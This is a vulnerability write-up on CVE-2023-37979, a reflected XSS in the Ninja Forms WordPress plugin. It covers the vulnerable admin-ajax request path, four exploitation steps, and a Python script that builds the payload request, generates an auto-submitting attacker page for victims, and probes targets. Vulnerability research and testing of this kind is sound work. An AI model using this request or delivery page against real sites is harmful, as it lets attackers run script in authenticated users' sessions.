Fire-Null / CVE-2023-37979

CVE-2023-37979


CVE-2023-37979: WordPress Authenticated XSS in Ninja-forms Plugin

| CVE ID | CVSS Severity | Discovered | Affected Plugin | Vendor | Vulnerability Type |
| --- | --- | --- | --- | --- | --- |
| CVE-2023-37979 | Medium | 27/07/2023 | Ninja-forms | WordPress | Reflected XSS |

Ninja Forms WordPress plugin

The Ninja Forms plugin is a popular form builder for WordPress sites, with over 800,000 active installations. Affected versions contain a reflected Cross-Site Scripting (XSS) flaw, CVE-2023-37979, in one of the plugin's AJAX handlers; this page traces how a request parameter reaches the response unsanitized and how that is exploited.

Let's Exploit

How Does the Exploit Work?

The exploit targets the request that the Ninja Forms plugin sends to /wp-admin/admin-ajax.php, the WordPress AJAX entry point. Among the request's parameters is action; when action is set to nf_batch_process, admin-ajax.php dispatches the request to the plugin's batch-processing handler, and that code path is where the reflected XSS lives. The following steps trace how a request value travels through that handler and back out in the response:

The handler first checks two things: the request method must be POST, and the request must carry a method_override parameter. The value of method_override names the controller method that will handle the request, so a crafted POST can steer the request into methods that the normal plugin flow would not call with attacker-controlled input.

With action=nf_batch_process the request reaches includes/AJAX/REST/BatchProcess.php. Its get_request_data function checks whether the request contains a data parameter; if it does, the function creates a data key in the $request_data array and assigns the raw parameter value to it. Nothing sanitizes or validates the value at this point, so whatever the client sent, including HTML markup and script, is carried forward unchanged.

In includes/Abstracts/Controller.php, the _respond function performs a series of checks, one of which requires that the data value is not empty. Once those conditions are satisfied, the function copies the data into the response variable that is written back to the client.

The problem is the combination of the two: BatchProcess.php stores the data parameter without sanitization, and _respond writes it back into the response. A malicious user who sends an XSS payload in data to the nf_batch_process action therefore gets that payload reflected verbatim into the response body.

Putting this together, the XSS vulnerability in the Ninja Forms WordPress plugin is exploited as follows:

  1. Send a POST request to the /wp-admin/admin-ajax.php endpoint.
  2. Set the action parameter to nf_batch_process.
  3. Include the method_override parameter and set it to _respond.
  4. Add the data parameter and set its value to an XSS payload.

The server reflects the payload into the response body, and because the response is served with a Content-Type of text/html, the browser parses it as an HTML document and executes the embedded script rather than treating it as inert data. This is a reflected XSS: the payload runs only in the browser that submits the crafted request, so the attack is delivered by getting a victim to submit that request from an attacker-controlled page. A quick way to confirm the condition on a target is to check both facts in the response: the Content-Type header says text/html, and the data value comes back unescaped.

When an authenticated user visits the malicious page, the crafted request is submitted from their browser and the script executes in the context of the vulnerable site.
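The four-step request and its delivery, as an added example written for this page (it is not the Fire-Null PoC and not Ninja Forms code). It builds the POST body, renders the auto-submitting attacker page that a victim would visit, and checks a response for the two facts the write-up relies on: a text/html Content-Type and the data value reflected unescaped. The target URL and the sample responses are constructed; only the parameter names and values come from the steps above.

```python
"""Added example for the nf_batch_process request described above.  This is
not the Fire-Null PoC and not Ninja Forms code.  TARGET and the sample
responses at the bottom are constructed, not captured from a real site."""
import html
import urllib.parse
import urllib.request

# Hypothetical target; the AJAX entry point is always /wp-admin/admin-ajax.php.
TARGET = "http://wordpress.example/wp-admin/admin-ajax.php"

# Benign canary: no quotes or slashes, so it survives URL and JSON encoding
# unchanged and is easy to spot in the response.
PAYLOAD = "<img src=x onerror=alert(document.domain)>"


def build_request(payload: str = PAYLOAD) -> dict:
    """The three parameters from steps 2-4 of the write-up."""
    return {
        "action": "nf_batch_process",   # admin-ajax.php routes this to BatchProcess
        "method_override": "_respond",  # the controller method that handles it
        "data": payload,                # stored unsanitised by get_request_data
    }


def encode_body(body: dict) -> bytes:
    """Form-encode the body the way a browser submits a POST form."""
    return urllib.parse.urlencode(body).encode()


def is_reflected_unescaped(content_type: str, body: str, payload: str = PAYLOAD) -> bool:
    """True when a browser would execute the payload: the response is served as
    text/html and the payload appears verbatim, not HTML-escaped.  A JSON
    Content-Type or an escaped copy means the same reflection is inert."""
    if "text/html" not in content_type.lower():
        return False
    return payload in body


def delivery_page(target: str = TARGET, payload: str = PAYLOAD) -> str:
    """Attacker-hosted page that auto-submits the POST from the victim's browser.
    A plain link cannot carry a POST body, so reflected XSS on a POST endpoint
    needs a form like this.  Values are HTML-escaped so the payload sits inertly
    in the attacker page and only becomes live when the vulnerable site
    reflects it back."""
    fields = "".join(
        f'<input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in build_request(payload).items()
    )
    return (
        f'<form id="f" method="post" action="{html.escape(target, quote=True)}">'
        f"{fields}</form>"
        '<script>document.getElementById("f").submit()</script>'
    )


def probe(target: str = TARGET, payload: str = PAYLOAD) -> bool:
    """Send the request and evaluate the live response.  Run this only against
    a site you are authorised to test."""
    req = urllib.request.Request(
        target, data=encode_body(build_request(payload)), method="POST"
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        ctype = resp.headers.get("Content-Type", "")
        return is_reflected_unescaped(ctype, resp.read().decode("utf-8", "replace"), payload)


# Constructed sample responses as (content type, body).  The exact response
# envelope is not the point; only whether data comes back raw and as HTML is.
VULNERABLE_RESPONSE = (
    "text/html; charset=UTF-8",
    '{"data":"<img src=x onerror=alert(document.domain)>","errors":[]}',
)
ESCAPED_RESPONSE = (
    "text/html; charset=UTF-8",
    '{"data":"&lt;img src=x onerror=alert(document.domain)&gt;","errors":[]}',
)
JSON_RESPONSE = (
    "application/json; charset=UTF-8",
    '{"data":"<img src=x onerror=alert(document.domain)>","errors":[]}',
)

if __name__ == "__main__":
    for name, (ctype, body) in (("vulnerable", VULNERABLE_RESPONSE),
                                ("escaped", ESCAPED_RESPONSE),
                                ("json", JSON_RESPONSE)):
        print(f"{name}: reflected XSS = {is_reflected_unescaped(ctype, body)}")
    print(encode_body(build_request()).decode())
```

The check deliberately requires both conditions: a site that keeps reflecting the value but serves it as application/json, or one that HTML-escapes it, does not execute the payload, so a scanner that only greps for the canary will report false positives.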


Exploit for CVE-2023-37979

The proof-of-concept exploit for CVE-2023-37979 can be downloaded from the linked repository: CVE-2023-37979. Use it only on systems you own or have explicit permission to test; running exploits without authorization may be illegal and is unethical.
